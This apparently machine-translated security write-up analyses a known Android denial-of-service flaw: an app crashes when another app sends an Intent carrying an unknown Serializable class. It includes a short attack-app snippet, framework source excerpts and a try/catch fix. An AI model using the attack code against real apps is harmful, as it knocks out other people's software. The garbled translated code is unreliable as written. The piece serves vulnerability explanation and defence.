Android denial of service vulnerability analysis and vulnerability detection

　　" Super Denial of service vulnerability " is an android generic denial of service vulnerability that could allow a malicious attacker to use this vulnerability to cause any app in the phone to crash and not work, almost affecting all Android devices currently on the market APP application.

Vulnerability Analysis:

　　0xr0ot and the Xbalien A common local denial of service vulnerability was found when communicating all of the exception types that could lead to application denial of service. This general-purpose local denial of service can result in a large area of app denial of service.

The denial of service for serialized objects is mainly due to the use of Getserializableextra () APIin the application, because the application developer does not judge the incoming data, Malicious apps can pass in malformed data, resulting in the application of local denial of service.

Vulnerability Application code snippet:

　　Intent i = getintent ();

　　if (I.getaction (). Equals ("Serializable_action")) {

　　I.getserializableextra ("Serializable_key");// no abnormal judgment.

　　}

Attack application code Snippet:

　　Intent i = new Intent ();

　　I.setaction ("Serializable_action");

　　I.setclassname ("Com.exp.serializable", "com.exp.serializable.MainActivity");

　　I.putextra ("Seriadddddlizable_dkey", XXX); here is the incoming malformed data

　　StartActivity (i);

java.lang.classcastexception

But later the communication found that when passing in a custom serialized object Serializable or getparcelable object, receive Intent The target component in Getserializableextra (),getparcelable () , etc. throws a class-undefined exception Java.lang.NoClassDefFoundError. This is because when you apply a serialized class object to a vulnerability that is not in the application itself, it must not be found in the application context.

The custom serialization class is simple:

　　public class Dataschema implements Serializable {

　　Private static final long serialversionuid = -3601187837704976264l;

　　Public Dataschema () {

　　Super ();

　　}

　　}

The corresponding attack code in the XXX Place in the New Dataschema (), we found that the incoming key whether or not the same as the vulnerability application, Throws a class-undefined exception.

As the test progresses, we discover through Logcat that it is not necessarily Getserializableextra (),getparcelable () in the error log caused by. Then we stretched out and tried to pass in our custom serialized class object to Getxxxextra () and found that the class was thrown out of the undefined exception.

To test the app code snippet:

　　protected void OnCreate (Bundle savedinstancestate) {

　　Intent Intent = Getintent ();

　　Intent.getstringextra ("ROIS");// This will still be due to Noclassdeffounderror Crash

　　}

We then tested a number of mainstream applications on the market, including BAT . Found that this method can kill. We started to think that this was the problem with Android itself and began to turn over the source code.

　　/frameworks/base/core/java/android/content/intent.java

　　public string Getstringextra (string name) {

　　return Mextras = = null? Null:mExtras.getString (name);

　　}

　　/frameworks/base/core/java/android/os/bundle.java

　　public string getString (string key) {

　　unparcel ();// working with Data

　　...

　　}

　　/* Package */synchronized void Unparcel () {

　　...

　　Mparcelleddata.readmapinternal (MMap, N, Mclassloader);

　　...

　　}

　　/frameworks/base/core/java/android/os/parcel.java

　　readmapinternal parse the data passed in

　　/* Package */void Readmapinternal (Map outval, int N,

　　ClassLoader loader) {

　　while (N > 0) {

　　Object key = ReadValue (loader);

　　Object value = readvalue (loader);

　　Outval.put (key, value);

　　n--;

　　}

　　}

Finally, when parsing to a Serializable object, throws an exception because the class is not loaded

　　Public final Serializable readserializable () {

　　...

　　try {

　　ObjectInputStream ois = new ObjectInputStream (Bais);

　　Return (Serializable) ois.readobject ();

　　} catch (IOException IoE) {

　　throw new RuntimeException ("Parcelable encountered" +

　　"IOException reading a Serializable object (name =" + name +

　　")", IoE);

　　} catch (ClassNotFoundException Cnfe) {

　　throw new RuntimeException ("Parcelable encountered" +

　　"ClassNotFoundException reading a Serializable object (name ="

　　+ name + ")", CNFE);

　　}

　　}

But looking back, Google certainly doesn't think it's an Android Bug, and developers just need to add a try catch to catch the exception.

Vulnerability Detection:

AI has developed an automated testing tool for developers vulnerability detection is possible . Detection Tool:http://www.ineice.com/

Bug fixes:

Whatever is get extra, as long as it is Getxxxextra (), plus try catch Catch the exception.

Android denial of service vulnerability analysis and vulnerability detection